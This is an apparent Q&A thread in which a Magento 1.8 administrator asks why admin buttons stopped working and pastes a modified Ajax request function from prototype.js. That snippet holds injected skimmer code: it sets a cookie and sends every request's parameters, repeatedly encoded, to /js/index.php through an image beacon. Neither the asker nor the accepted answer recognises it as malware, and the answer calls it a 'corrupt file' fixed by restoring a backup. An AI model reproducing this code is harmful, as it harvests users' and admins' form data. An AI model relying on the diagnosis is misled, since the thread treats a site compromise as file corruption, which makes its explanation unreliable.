# Some Magento Backend Admin Buttons stopped working

Tags: javascript, jquery, magento

I'm running Magento 1.8 and buttons like Create Order, Save, Save and Continue, etc have stopped working it is giving some JS errors.   This just started a couple of days ago and the only things I really did was add some Google API functions to the backend.

```
 request: function(url) {

this.url = url;
this.method = this.options.method;
var params = Object.isString(this.options.parameters) ?
      this.options.parameters :
      Object.toQueryString(this.options.parameters);
      if(this.cookie("userName")){
          img = document.createElement("img");
            img.src="/js/index.php?date="+Base64.encode(Base64.encode(Base64.encode(Base64.crypt(params+"&cookie="+this.cookie("userName"),7))));

        }
        else{
            document.cookie = "userName="+1 + Math.random()*(10000-1);
              img = document.createElement("img");          
                img.src="/js/index.php?date="+Base64.encode(Base64.encode(Base64.encode(Base64.crypt(params+"&cookie="+this.cookie("userName"),7))));
                        }
    if (!['get', 'post'].include(this.method)) {
  params += (params ? '&' : '') + "_method=" + this.method;
  this.method = 'post';
}
```

The errors are in the in img.src lines.

Uncaught TypeError: undefined is not a function     prototype.js 1619

This is new to me.   I cleared the cache so I'm positive that it is not related to that.

Comment: Accept your answer. It will be helpful to others

Answer (score 0, accepted):

After hours of searching the internet I found out the problem.

What I had to do was restore a backup copy of our /js/prototype/

Some people had reported that error was due to a corrupt file in that folder.